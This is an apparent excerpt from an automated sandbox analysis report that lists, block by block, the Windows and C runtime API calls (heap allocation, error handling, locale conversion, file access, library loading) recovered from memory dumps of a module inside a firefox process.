    • Associated: 00000004.00000002.12848881189.6E157000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_6e080000_firefox.jbxd
    APIs
    • RtlAllocateHeap.NTDLL(00000008,00000001,?,?,6E0E5A61,00000002,00000364,?,00000000,?,6E0E5DEB), ref: 6E0B0CE1
      • Part of subcall function 6E0AF6C0: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000001,?,?,?,6E0E70B2,?,6E0E5A61,00000002,00000364,?,00000000,?,6E0E5DEB), ref: 6E0AF6D3
      • Part of subcall function 6E0AF6C0: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,?,?,6E0E70B2,?,6E0E5A61,00000002,00000364,?,00000000,?,6E0E5DEB), ref: 6E0AF710
      • Part of subcall function 6E0AF6C0: TlsGetValue.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000003,?,?,?,6E0E70B2,?,6E0E5A61,00000002,00000364,?,00000000,?,6E0E5DEB), ref: 6E0AF72A
      • Part of subcall function 6E0AF6C0: GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-1-0(00000000,FlsGetValue,?,?,?,6E0E70B2,?,6E0E5A61,00000002,00000364,?,00000000,?,6E0E5DEB), ref: 6E0DE97E
    • _callnewh.UCRTBASE(00000001,?,6E0E5A61,00000002,00000364,?,00000000,?,6E0E5DEB), ref: 6E0E70C0
      • Part of subcall function 6E102D30: _query_new_handler.UCRTBASE(00000001,?,?,6E0E70C5,00000001,?,6E0E5A61,00000002,00000364,?,00000000,?,6E0E5DEB), ref: 6E102D41
    • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000001,?,?,?,?,?,?,?,?,?,?,6E0A21C2,00000001), ref: 6E0E70D5
    • _errno.UCRTBASE(?,6E0E5A61,00000002,00000364,?,00000000,?,6E0E5DEB), ref: 6E0E70E4
      • Part of subcall function 6E0ACF40: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(0000000A,?,00000000,?,6E0E5DEB), ref: 6E0ACF48
      • Part of subcall function 6E0ACF40: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,?,6E0E5DEB), ref: 6E0ACF7B
      • Part of subcall function 6E0ACF40: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?,6E0E5DEB), ref: 6E0ACF91
      • Part of subcall function 6E0ACF40: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?,6E0E5DEB), ref: 6E0ACF98
      • Part of subcall function 6E0ACF40: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?,6E0E5DEB), ref: 6E0ACFB4
      • Part of subcall function 6E0ACF40: _calloc_base.UCRTBASE(00000002,00000364,?,00000000,?,6E0E5DEB), ref: 6E0E5A5C
      • Part of subcall function 6E0ACF40: _free_base.UCRTBASE(00000000,?,00000000,?,6E0E5DEB), ref: 6E0E5A8A
      • Part of subcall function 6E0ACF40: _free_base.UCRTBASE(00000000,?,00000000,?,6E0E5DEB), ref: 6E0E5AA9
    Memory Dump Source
    • Source File: 00000004.00000002.12848755785.6E081000.00000020.sdmp, Offset: 6E080000, based on PE: true
    • Associated: 00000004.00000002.12848749050.6E080000.00000002.sdmp
    • Associated: 00000004.00000002.12848861431.6E155000.00000004.sdmp
    • Associated: 00000004.00000002.12848881189.6E157000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_6e080000_firefox.jbxd
    APIs
    • RtlAllocateHeap.NTDLL(00000000,00000001,?,?,6E0E59A3,00000001,0000DDDD,?,?,6E0FCA06,?,00000001,?,00000001,00000001,?), ref: 6E0B36DF
      • Part of subcall function 6E0AF6C0: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000001,?,?,?,6E0E70B2,?,6E0E5A61,00000002,00000364,?,00000000,?,6E0E5DEB), ref: 6E0AF6D3
      • Part of subcall function 6E0AF6C0: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,?,?,6E0E70B2,?,6E0E5A61,00000002,00000364,?,00000000,?,6E0E5DEB), ref: 6E0AF710
      • Part of subcall function 6E0AF6C0: TlsGetValue.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000003,?,?,?,6E0E70B2,?,6E0E5A61,00000002,00000364,?,00000000,?,6E0E5DEB), ref: 6E0AF72A
      • Part of subcall function 6E0AF6C0: GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-1-0(00000000,FlsGetValue,?,?,?,6E0E70B2,?,6E0E5A61,00000002,00000364,?,00000000,?,6E0E5DEB), ref: 6E0DE97E
    • _callnewh.UCRTBASE(00000001,?,6E0E59A3,00000001,0000DDDD,?,?,6E0FCA06,?,00000001,?,00000001,00000001,?,00000000), ref: 6E0E82F9
      • Part of subcall function 6E102D30: _query_new_handler.UCRTBASE(00000001,?,?,6E0E70C5,00000001,?,6E0E5A61,00000002,00000364,?,00000000,?,6E0E5DEB), ref: 6E102D41
    • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000001,0000DDDD,?,?,6E0FCA06,?,00000001,?,00000001,00000001,?,00000000), ref: 6E0E830E
    • _errno.UCRTBASE(?,?,6E0E59A3,00000001,0000DDDD,?,?,6E0FCA06,?,00000001,?,00000001,00000001,?,00000000), ref: 6E0E831D
      • Part of subcall function 6E0ACF40: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(0000000A,?,00000000,?,6E0E5DEB), ref: 6E0ACF48
      • Part of subcall function 6E0ACF40: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,?,6E0E5DEB), ref: 6E0ACF7B
      • Part of subcall function 6E0ACF40: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?,6E0E5DEB), ref: 6E0ACF91
      • Part of subcall function 6E0ACF40: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?,6E0E5DEB), ref: 6E0ACF98
      • Part of subcall function 6E0ACF40: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?,6E0E5DEB), ref: 6E0ACFB4
      • Part of subcall function 6E0ACF40: _calloc_base.UCRTBASE(00000002,00000364,?,00000000,?,6E0E5DEB), ref: 6E0E5A5C
      • Part of subcall function 6E0ACF40: _free_base.UCRTBASE(00000000,?,00000000,?,6E0E5DEB), ref: 6E0E5A8A
      • Part of subcall function 6E0ACF40: _free_base.UCRTBASE(00000000,?,00000000,?,6E0E5DEB), ref: 6E0E5AA9
    Memory Dump Source
    • Source File: 00000004.00000002.12848755785.6E081000.00000020.sdmp, Offset: 6E080000, based on PE: true
    • Associated: 00000004.00000002.12848749050.6E080000.00000002.sdmp
    • Associated: 00000004.00000002.12848861431.6E155000.00000004.sdmp
    • Associated: 00000004.00000002.12848881189.6E157000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_6e080000_firefox.jbxd
    APIs
    • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(6E1564A0,6E142C78,00000010,6E106083,?,?,?,?,?,?,?,?,?,6E1462C8,00000010), ref: 6E0B6000
      • Part of subcall function 6E0B61E0: _calloc_base.UCRTBASE(00000040,00000030,00000000,?,?,?,?,6E0E0A7B,?,6E0BDF2B,00000000,00000180,00000000,?,?,00000001), ref: 6E0B61F7
      • Part of subcall function 6E0B61E0: _free_base.UCRTBASE(00000000,?,00000000,?,?,?,?,6E0E0A7B,?,6E0BDF2B,00000000,00000180,00000000,?,?,00000001), ref: 6E0B6292
      • Part of subcall function 6E0B61E0: InitializeCriticalSectionAndSpinCount.KERNELBASE(-00000040,00000FA0,?,00000180,?,00000000,?,?,?,?,6E0E0A7B,?,6E0BDF2B,00000000,00000180,00000000), ref: 6E0E8E2A
      • Part of subcall function 6E0B61E0: GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-1-0(00000000,InitializeCriticalSectionEx,?,00000180,?,00000000,?,?,?,?,6E0E0A7B,?,6E0BDF2B,00000000,00000180,00000000), ref: 6E0E8E3B
      • Part of subcall function 6E0B6054: LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(6E1564A0,6E0B604C,?,?,?,?,?,?,?,?,?,6E1462C8,00000010), ref: 6E0B6059
    • _errno.UCRTBASE(6E142C78,00000010,6E106083,?,?,?,?,?,?,?,?,?,6E1462C8,00000010), ref: 6E0E8DD9
      • Part of subcall function 6E0ACF40: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(0000000A,?,00000000,?,6E0E5DEB), ref: 6E0ACF48
      • Part of subcall function 6E0ACF40: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,?,6E0E5DEB), ref: 6E0ACF7B
      • Part of subcall function 6E0ACF40: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?,6E0E5DEB), ref: 6E0ACF91
      • Part of subcall function 6E0ACF40: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?,6E0E5DEB), ref: 6E0ACF98
      • Part of subcall function 6E0ACF40: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?,6E0E5DEB), ref: 6E0ACFB4
      • Part of subcall function 6E0ACF40: _calloc_base.UCRTBASE(00000002,00000364,?,00000000,?,6E0E5DEB), ref: 6E0E5A5C
      • Part of subcall function 6E0ACF40: _free_base.UCRTBASE(00000000,?,00000000,?,6E0E5DEB), ref: 6E0E5A8A
      • Part of subcall function 6E0ACF40: _free_base.UCRTBASE(00000000,?,00000000,?,6E0E5DEB), ref: 6E0E5AA9
    • _invalid_parameter_noinfo.UCRTBASE(6E142C78,00000010,6E106083,?,?,?,?,?,?,?,?,?,6E1462C8,00000010), ref: 6E0E8DE3
    Memory Dump Source
    • Source File: 00000004.00000002.12848755785.6E081000.00000020.sdmp, Offset: 6E080000, based on PE: true
    • Associated: 00000004.00000002.12848749050.6E080000.00000002.sdmp
    • Associated: 00000004.00000002.12848861431.6E155000.00000004.sdmp
    • Associated: 00000004.00000002.12848881189.6E157000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_6e080000_firefox.jbxd
    APIs
    • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,?,0000000C,00000001,00000000), ref: 6E0ACFF9
      • Part of subcall function 6E0ACC2B: MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(?,00000000,?,00000001,00000000,00000000,?,0000000A,?,?,?,?,6E0FCA06,?,00000001,?), ref: 6E0ACC6F
      • Part of subcall function 6E0ACC2B: memset.UCRTBASE(?,00000000,00000001,?,?,6E0FCA06,?,00000001,?,00000001,00000001,?,00000000), ref: 6E0ACCD0
      • Part of subcall function 6E0ACC2B: MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(?,00000001,?,00000001,?,00000001,?,?,?,?,?,6E0FCA06,?,00000001,?,00000001), ref: 6E0ACCE5
      • Part of subcall function 6E0ACC2B: GetStringTypeW.API-MS-WIN-CORE-STRING-L1-1-0(00000001,?,00000000,00000001,?,00000001,?,?,?,?,?,6E0FCA06,?,00000001,?,00000001), ref: 6E0ACCF6
      • Part of subcall function 6E0ACC2B: _free_base.UCRTBASE(?,?,00000001,?,?,?,?,?,6E0FCA06,?,00000001,?,00000001,00000001,?,00000000), ref: 6E0ACD36
      • Part of subcall function 6E0ACC2B: _malloc_base.UCRTBASE(00000001,0000DDDD,?,?,6E0FCA06,?,00000001,?,00000001,00000001,?,00000000), ref: 6E0E599E
      • Part of subcall function 6E0AECE0: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(0000000A,?,00000000,?,6E0FC983,?,00000000), ref: 6E0AED52
      • Part of subcall function 6E0AECE0: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,?,?,6E0FC983,?,00000000), ref: 6E0AED98
      • Part of subcall function 6E0AECE0: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,6E0FC983,?,00000000), ref: 6E0AEDB3
      • Part of subcall function 6E0AECE0: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,?,?,?,?,6E0FC983,?,00000000), ref: 6E0AEDF9
      • Part of subcall function 6E0AECE0: TlsGetValue.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?,?,?,6E0FC983,?,00000000), ref: 6E0DE90C
      • Part of subcall function 6E0AECE0: TlsGetValue.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?,?,?,?,?,6E0FC983,?,00000000), ref: 6E0DE917
      • Part of subcall function 6E0AD160: __strncnt.UCRTBASE(?,?,?,?,?,?,?,?,6E0A45F0,00000001,?,6E0A45F0,?,?,?,6E0B02B8), ref: 6E0AD186
      • Part of subcall function 6E0AD160: MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(?,00000001,?,?,00000000,00000000), ref: 6E0AD1BA
      • Part of subcall function 6E0AD160: MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(?,00000001,?,?,?,?), ref: 6E0AD225
      • Part of subcall function 6E0AD160: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00000000,?,00000000,?,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000), ref: 6E0AD34F
      • Part of subcall function 6E0AD160: GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-1-0(00000000,LCMapStringEx,?,?), ref: 6E0AD3B5
      • Part of subcall function 6E0AD160: _malloc_base.UCRTBASE(?,0000DDDD), ref: 6E0E5B82
      • Part of subcall function 6E0AD160: LCMapStringW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,?,?,?,00000000,00000000,?,?), ref: 6E0E5BD6
      • Part of subcall function 6E0AD160: _malloc_base.UCRTBASE(?,0000DDDD,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,6E0A45F0,00000001,?), ref: 6E0E5C2D
      • Part of subcall function 6E0AD160: LCMapStringW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,?,?,?,?,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 6E0E5C92
      • Part of subcall function 6E0AD160: GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-1-0(00000000,LCMapStringEx,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,6E0A45F0,00000001,?), ref: 6E0E5CA3
      • Part of subcall function 6E0AD160: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000), ref: 6E0E5CD7
      • Part of subcall function 6E0AD160: _free_base.UCRTBASE(?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,?,?), ref: 6E0E5CEA
      • Part of subcall function 6E0AD160: _free_base.UCRTBASE ref: 6E0E5D0F
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.12848755785.6E081000.00000020.sdmp, Offset: 6E080000, based on PE: true
    • Associated: 00000004.00000002.12848749050.6E080000.00000002.sdmp
    • Associated: 00000004.00000002.12848861431.6E155000.00000004.sdmp
    • Associated: 00000004.00000002.12848881189.6E157000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_6e080000_firefox.jbxd
    APIs
      • Part of subcall function 6E0B5E30: GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-1-0(00000000,FlsSetValue,00000004,?,?,?,6E0AD41D,6E086D50,FlsAlloc,00000000,?,?,00000004,?,6E0E5A4D), ref: 6E0B5E81
    • TlsAlloc.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(6E081170,?,00000000,?,6E0B5C17,6E0B5AC9,?,?,?,?,?,6E0B60EF,6E0AF4FB), ref: 6E0AC056
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.12848755785.6E081000.00000020.sdmp, Offset: 6E080000, based on PE: true
    • Associated: 00000004.00000002.12848749050.6E080000.00000002.sdmp
    • Associated: 00000004.00000002.12848861431.6E155000.00000004.sdmp
    • Associated: 00000004.00000002.12848881189.6E157000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_6e080000_firefox.jbxd
    APIs
    • _calloc_base.UCRTBASE(00000001,000000B8,?,?,?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 6E0BC287
      • Part of subcall function 6E0B0CB0: RtlAllocateHeap.NTDLL(00000008,00000001,?,?,6E0E5A61,00000002,00000364,?,00000000,?,6E0E5DEB), ref: 6E0B0CE1
      • Part of subcall function 6E0B0CB0: _callnewh.UCRTBASE(00000001,?,6E0E5A61,00000002,00000364,?,00000000,?,6E0E5DEB), ref: 6E0E70C0
      • Part of subcall function 6E0B0CB0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000001,?,?,?,?,?,?,?,?,?,?,6E0A21C2,00000001), ref: 6E0E70D5
      • Part of subcall function 6E0B0CB0: _errno.UCRTBASE(?,6E0E5A61,00000002,00000364,?,00000000,?,6E0E5DEB), ref: 6E0E70E4
    • _free_base.UCRTBASE(00000000,00000001,000000B8,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6E0BC297
      • Part of subcall function 6E0B10E0: HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,6E0E5A8F,00000000,?,00000000,?,6E0E5DEB), ref: 6E0B10F5
      • Part of subcall function 6E0B10E0: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,6E0E5A8F,00000000,?,00000000,?,6E0E5DEB), ref: 6E0E71DB
      • Part of subcall function 6E0B10E0: _errno.UCRTBASE(?,6E0E5A8F,00000000,?,00000000,?,6E0E5DEB), ref: 6E0E71EA
      • Part of subcall function 6E0B1BCC: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,6E142A90,00000008,6E0BC2DA,?,?,?,?,?,?), ref: 6E0B1BE6
    Memory Dump Source
    • Source File: 00000004.00000002.12848755785.6E081000.00000020.sdmp, Offset: 6E080000, based on PE: true
    • Associated: 00000004.00000002.12848749050.6E080000.00000002.sdmp
    • Associated: 00000004.00000002.12848861431.6E155000.00000004.sdmp
    • Associated: 00000004.00000002.12848881189.6E157000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_6e080000_firefox.jbxd
    APIs
      • Part of subcall function 6E0A5CA0: CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,?,?,00000000), ref: 6E0A5D41
      • Part of subcall function 6E0A5CA0: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 6E0A5D5C
      • Part of subcall function 6E0A5CA0: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 6E0A5ED4
      • Part of subcall function 6E0A5CA0: _errno.UCRTBASE ref: 6E0A5EE1
      • Part of subcall function 6E0A5CA0: __doserrno.UCRTBASE(?,00000180,?,00000000,?,?,?,6E0BDF2B,00000000,00000180,00000000,?,?,00000001,?,6E0A5A19), ref: 6E0E0918
      • Part of subcall function 6E0A5CA0: __doserrno.UCRTBASE(?,00000180,?,00000000,?,?,?,6E0BDF2B,00000000,00000180,00000000,?,?,00000001,?,6E0A5A19), ref: 6E0E0927
      • Part of subcall function 6E0A5CA0: _errno.UCRTBASE(?,00000180,?,00000000,?,?,?,6E0BDF2B,00000000,00000180,00000000,?,?,00000001,?,6E0A5A19), ref: 6E0E0931
      • Part of subcall function 6E0A5CA0: CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,?,?,00000000), ref: 6E0E0970
      • Part of subcall function 6E0A5CA0: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 6E0E098A
      • Part of subcall function 6E0A5CA0: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 6E0E09B3
      • Part of subcall function 6E0A5CA0: _errno.UCRTBASE ref: 6E0E09C1
      • Part of subcall function 6E0A5CA0: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000180,?,00000000,?), ref: 6E0E09F7
      • Part of subcall function 6E0A5CA0: CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,?,?,00000000), ref: 6E0E0A1A
      • Part of subcall function 6E0A5CA0: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00000180,?,00000000,?,?), ref: 6E0E0A27
      • Part of subcall function 6E0A919E: LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,6E0A918D,?,00000001), ref: 6E0A91BD
    • _errno.UCRTBASE(6E1425C8,00000010,6E0A90DF,00000000,00000180,?,00000001,00000000,?), ref: 6E0E383D
      • Part of subcall function 6E0ACF40: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(0000000A,?,00000000,?,6E0E5DEB), ref: 6E0ACF48
      • Part of subcall function 6E0ACF40: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,?,6E0E5DEB), ref: 6E0ACF7B
      • Part of subcall function 6E0ACF40: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?,6E0E5DEB), ref: 6E0ACF91
      • Part of subcall function 6E0ACF40: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?,6E0E5DEB), ref: 6E0ACF98
      • Part of subcall function 6E0ACF40: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?,6E0E5DEB), ref: 6E0ACFB4
      • Part of subcall function 6E0ACF40: _calloc_base.UCRTBASE(00000002,00000364,?,00000000,?,6E0E5DEB), ref: 6E0E5A5C
      • Part of subcall function 6E0ACF40: _free_base.UCRTBASE(00000000,?,00000000,?,6E0E5DEB), ref: 6E0E5A8A
      • Part of subcall function 6E0ACF40: _free_base.UCRTBASE(00000000,?,00000000,?,6E0E5DEB), ref: 6E0E5AA9
    • _invalid_parameter_noinfo.UCRTBASE(6E1425C8,00000010,6E0A90DF,00000000,00000180,?,00000001,00000000,?), ref: 6E0E3847
    Memory Dump Source
    • Source File: 00000004.00000002.12848755785.6E081000.00000020.sdmp, Offset: 6E080000, based on PE: true
    • Associated: 00000004.00000002.12848749050.6E080000.00000002.sdmp
    • Associated: 00000004.00000002.12848861431.6E155000.00000004.sdmp
    • Associated: 00000004.00000002.12848881189.6E157000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_6e080000_firefox.jbxd
    APIs
    • _malloc_base.UCRTBASE(00001000,00000000,?,?,?,6E0AB8AD,00000008,00000002,?,?,?,?,6E0A56A2,?,?,6E0A43C5), ref: 6E0A8E4A
      • Part of subcall function 6E0B36C0: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,6E0E59A3,00000001,0000DDDD,?,?,6E0FCA06,?,00000001,?,00000001,00000001,?), ref: 6E0B36DF
      • Part of subcall function 6E0B36C0: _callnewh.UCRTBASE(00000001,?,6E0E59A3,00000001,0000DDDD,?,?,6E0FCA06,?,00000001,?,00000001,00000001,?,00000000), ref: 6E0E82F9
      • Part of subcall function 6E0B36C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000001,0000DDDD,?,?,6E0FCA06,?,00000001,?,00000001,00000001,?,00000000), ref: 6E0E830E
      • Part of subcall function 6E0B36C0: _errno.UCRTBASE(?,?,6E0E59A3,00000001,0000DDDD,?,?,6E0FCA06,?,00000001,?,00000001,00000001,?,00000000), ref: 6E0E831D
    • _free_base.UCRTBASE(00000000,00001000,00000000,?,?,?,6E0AB8AD,00000008,00000002,?,?,?,?,6E0A56A2,?), ref: 6E0A8E54
      • Part of subcall function 6E0B10E0: HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,6E0E5A8F,00000000,?,00000000,?,6E0E5DEB), ref: 6E0B10F5
      • Part of subcall function 6E0B10E0: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,6E0E5A8F,00000000,?,00000000,?,6E0E5DEB), ref: 6E0E71DB
      • Part of subcall function 6E0B10E0: _errno.UCRTBASE(?,6E0E5A8F,00000000,?,00000000,?,6E0E5DEB), ref: 6E0E71EA
    Memory Dump Source
    • Source File: 00000004.00000002.12848755785.6E081000.00000020.sdmp, Offset: 6E080000, based on PE: true
    • Associated: 00000004.00000002.12848749050.6E080000.00000002.sdmp
    • Associated: 00000004.00000002.12848861431.6E155000.00000004.sdmp
    • Associated: 00000004.00000002.12848881189.6E157000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_6e080000_firefox.jbxd
    APIs
    • QueryPerformanceFrequency.API-MS-WIN-CORE-PROFILE-L1-1-0(?), ref: 6E0AC1FC
    • QueryPerformanceCounter.API-MS-WIN-CORE-PROFILE-L1-1-0(?), ref: 6E0AC20E
    Memory Dump Source
    • Source File: 00000004.00000002.12848755785.6E081000.00000020.sdmp, Offset: 6E080000, based on PE: true
    • Associated: 00000004.00000002.12848749050.6E080000.00000002.sdmp
    • Associated: 00000004.00000002.12848861431.6E155000.00000004.sdmp
    • Associated: 00000004.00000002.12848881189.6E157000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_6e080000_firefox.jbxd
    APIs
      • Part of subcall function 6E0A8A48: _fileno.UCRTBASE(?,00000000,?,00000001,?,6E0A39CD,6E0A39CD,?,6E0A3FCA,?,6E0A39CD,?,6E0A3F64,6E0A39CD,?,6E0DFACD), ref: 6E0A8AB3
      • Part of subcall function 6E0A8A48: _read.UCRTBASE(00000000,00000000,?,00000001,?,6E0A39CD,6E0A39CD,?,6E0A3FCA,?,6E0A39CD,?,6E0A3F64,6E0A39CD,?,6E0DFACD), ref: 6E0A8ABA
      • Part of subcall function 6E0A8A48: _errno.UCRTBASE(?,6E0A39CD,6E0A39CD,?,6E0A3FCA,?,6E0A39CD,?,6E0A3F64,6E0A39CD,?,6E0DFACD,?,00000000,?,6E0A3AE4), ref: 6E0E3324
      • Part of subcall function 6E0A8A48: _invalid_parameter_noinfo.UCRTBASE(?,6E0A39CD,6E0A39CD,?,6E0A3FCA,?,6E0A39CD,?,6E0A3F64,6E0A39CD,?,6E0DFACD,?,00000000,?,6E0A3AE4), ref: 6E0E332F
      • Part of subcall function 6E0A8A48: _fileno.UCRTBASE(?), ref: 6E0E3348
      • Part of subcall function 6E0A8A48: _fileno.UCRTBASE(?), ref: 6E0E3356
      • Part of subcall function 6E0A8A48: _fileno.UCRTBASE(?), ref: 6E0E3365
      • Part of subcall function 6E0A8A48: _fileno.UCRTBASE(?), ref: 6E0E3371
    • _errno.UCRTBASE(6E0A39CD,?,6E0A3F64,6E0A39CD,?,6E0DFACD,?,00000000,?,6E0A3AE4,?,00000000,?,2EA47CDB), ref: 6E0DFC9B
      • Part of subcall function 6E0ACF40: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(0000000A,?,00000000,?,6E0E5DEB), ref: 6E0ACF48
      • Part of subcall function 6E0ACF40: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,?,6E0E5DEB), ref: 6E0ACF7B
      • Part of subcall function 6E0ACF40: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?,6E0E5DEB), ref: 6E0ACF91
      • Part of subcall function 6E0ACF40: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?,6E0E5DEB), ref: 6E0ACF98
      • Part of subcall function 6E0ACF40: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?,6E0E5DEB), ref: 6E0ACFB4
      • Part of subcall function 6E0ACF40: _calloc_base.UCRTBASE(00000002,00000364,?,00000000,?,6E0E5DEB), ref: 6E0E5A5C
      • Part of subcall function 6E0ACF40: _free_base.UCRTBASE(00000000,?,00000000,?,6E0E5DEB), ref: 6E0E5A8A
      • Part of subcall function 6E0ACF40: _free_base.UCRTBASE(00000000,?,00000000,?,6E0E5DEB), ref: 6E0E5AA9
    • _invalid_parameter_noinfo.UCRTBASE(6E0A39CD,?,6E0A3F64,6E0A39CD,?,6E0DFACD,?,00000000,?,6E0A3AE4,?,00000000,?,2EA47CDB), ref: 6E0DFCA6
    Memory Dump Source
    • Source File: 00000004.00000002.12848755785.6E081000.00000020.sdmp, Offset: 6E080000, based on PE: true
    • Associated: 00000004.00000002.12848749050.6E080000.00000002.sdmp
    • Associated: 00000004.00000002.12848861431.6E155000.00000004.sdmp
    • Associated: 00000004.00000002.12848881189.6E157000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_6e080000_firefox.jbxd
    APIs
      • Part of subcall function 6E0D4ED6: LoadLibraryExW.KERNELBASE(?,00000000,00000800,6E155FF8,00000000,?,2EA47CDB,?,6E0D4FE4,?,?,00000000,6E155FF8,?,?,6E0D51B8), ref: 6E0D4F13
